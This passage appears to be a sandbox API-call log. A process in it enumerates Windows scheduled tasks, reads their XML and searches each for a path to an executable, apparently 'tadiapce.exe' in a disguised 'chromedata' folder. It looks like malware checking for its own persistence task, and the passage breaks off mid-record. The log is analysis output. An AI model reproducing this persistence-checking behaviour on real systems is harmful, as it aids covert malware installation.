	[0098.953] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0xa, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0098.953] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe90) returned 0x0
	[0098.955] IRegisteredTaskCollection:get_Count (in: This=0x63fe90, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0098.955] IRegisteredTaskCollection:get_Item (in: This=0x63fe90, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff88) returned 0x0
	[0098.955] IRegisteredTask:get_Name (in: This=0x63ff88, pName=0x128e3c | out: pName=0x128e3c*="Microsoft-Windows-DiskDiagnosticDataCollector") returned 0x0
	[0098.955] IRegisteredTask:get_Xml (in: This=0x63ff88, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\System32\\DFDTS.dll,-101)</Author>\r\n    <Source>$(@%SystemRoot%\\System32\\DFDTS.dll,-100)</Source>\r\n    <URI>Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\DFDTS.dll,-119)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <WakeToRun>false</WakeToRun>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T01:00:00</StartBoundary>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>2</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>dfdts.dll,DfdGetDefaultPolicyAndSMART</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0098.958] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\System32\\DFDTS.dll,-101)</Author>\r\n    <Source>$(@%SystemRoot%\\System32\\DFDTS.dll,-100)</Source>\r\n    <URI>Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\DFDTS.dll,-119)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <WakeToRun>false</WakeToRun>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T01:00:00</StartBoundary>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>2</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>dfdts.dll,DfdGetDefaultPolicyAndSMART</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0098.986] IUnknown:Release (This=0x63ff88) returned 0x0
	[0098.986] IRegisteredTaskCollection:get_Item (in: This=0x63fe90, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff88) returned 0x0
	[0098.986] IRegisteredTask:get_Name (in: This=0x63ff88, pName=0x128e3c | out: pName=0x128e3c*="Microsoft-Windows-DiskDiagnosticResolver") returned 0x0
	[0098.986] IRegisteredTask:get_Xml (in: This=0x63ff88, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\System32\\DFDTS.dll,-101)</Author>\r\n    <Source>$(@%SystemRoot%\\System32\\DFDTS.dll,-100)</Source>\r\n    <URI>Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\DFDTS.dll,-118)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <LogonTrigger />\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\DFDWiz.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0098.988] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\System32\\DFDTS.dll,-101)</Author>\r\n    <Source>$(@%SystemRoot%\\System32\\DFDTS.dll,-100)</Source>\r\n    <URI>Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\DFDTS.dll,-118)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <LogonTrigger />\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\DFDWiz.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.011] IUnknown:Release (This=0x63ff88) returned 0x0
	[0099.011] IUnknown:Release (This=0x63fe90) returned 0x0
	[0099.011] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe90) returned 0x0
	[0099.013] ITaskFolderCollection:get_Count (in: This=0x63fe90, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0099.013] IUnknown:Release (This=0x63fe90) returned 0x0
	[0099.013] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0099.013] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0xb, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0099.013] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe80) returned 0x0
	[0099.016] IRegisteredTaskCollection:get_Count (in: This=0x63fe80, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0099.016] IRegisteredTaskCollection:get_Item (in: This=0x63fe80, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff68) returned 0x0
	[0099.016] IRegisteredTask:get_Name (in: This=0x63ff68, pName=0x128e3c | out: pName=0x128e3c*="Notifications") returned 0x0
	[0099.016] IRegisteredTask:get_Xml (in: This=0x63ff68, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Description>$(@%systemRoot%\\system32\\LocationNotifications.exe,-102)</Description>\r\n    <URI>Microsoft\\Windows\\Location\\Notifications</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)</SecurityDescriptor>\r\n    <Version>1.3</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"Application\"&gt;&lt;Select Path=\"Application\"&gt;*[System[Provider[@Name='LocationNotifications'] and EventID=1]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <Exec>\r\n      <Command>%windir%\\System32\\LocationNotifications.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.018] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Description>$(@%systemRoot%\\system32\\LocationNotifications.exe,-102)</Description>\r\n    <URI>Microsoft\\Windows\\Location\\Notifications</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)</SecurityDescriptor>\r\n    <Version>1.3</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"Application\"&gt;&lt;Select Path=\"Application\"&gt;*[System[Provider[@Name='LocationNotifications'] and EventID=1]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <Exec>\r\n      <Command>%windir%\\System32\\LocationNotifications.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.046] IUnknown:Release (This=0x63ff68) returned 0x0
	[0099.046] IUnknown:Release (This=0x63fe80) returned 0x0
	[0099.046] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe80) returned 0x0
	[0099.047] ITaskFolderCollection:get_Count (in: This=0x63fe80, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0099.047] IUnknown:Release (This=0x63fe80) returned 0x0
	[0099.047] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0099.047] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0xc, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0099.048] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe88) returned 0x0
	[0099.049] IRegisteredTaskCollection:get_Count (in: This=0x63fe88, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0099.049] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.049] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="WinSAT") returned 0x0
	[0099.049] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\winsatapi.dll,-113)</Source>\r\n    <Date>2008-02-25T19:15:00</Date>\r\n    <Author>$(@%systemroot%\\system32\\winsatapi.dll,-112)</Author>\r\n    <Description>$(@%systemroot%\\system32\\winsatapi.dll,-114)</Description>\r\n    <URI>Microsoft\\Windows\\Maintenance\\WinSAT</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"$creator\">\r\n      <GroupId>S-1-5-32-544</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"$creator\">\r\n    <ComHandler>\r\n      <ClassId>{A9A33436-678B-4C9C-A211-7CC38785E79D}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.052] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\winsatapi.dll,-113)</Source>\r\n    <Date>2008-02-25T19:15:00</Date>\r\n    <Author>$(@%systemroot%\\system32\\winsatapi.dll,-112)</Author>\r\n    <Description>$(@%systemroot%\\system32\\winsatapi.dll,-114)</Description>\r\n    <URI>Microsoft\\Windows\\Maintenance\\WinSAT</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"$creator\">\r\n      <GroupId>S-1-5-32-544</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"$creator\">\r\n    <ComHandler>\r\n      <ClassId>{A9A33436-678B-4C9C-A211-7CC38785E79D}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.083] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.083] IUnknown:Release (This=0x63fe88) returned 0x0
	[0099.083] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe88) returned 0x0
	[0099.084] ITaskFolderCollection:get_Count (in: This=0x63fe88, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0099.084] IUnknown:Release (This=0x63fe88) returned 0x0
	[0099.084] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0099.084] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0xd, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0099.085] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe88) returned 0x0
	[0099.098] IRegisteredTaskCollection:get_Count (in: This=0x63fe88, pCount=0x128e30 | out: pCount=0x128e30*=21) returned 0x0
	[0099.098] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.098] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="ActivateWindowsSearch") returned 0x0
	[0099.098] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ActivateWindowsSearch</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoActivateWindowsSearch</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.100] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ActivateWindowsSearch</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoActivateWindowsSearch</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.119] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.119] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.119] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="ConfigureInternetTimeService") returned 0x0
	[0099.119] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ConfigureInternetTimeService</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-23)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    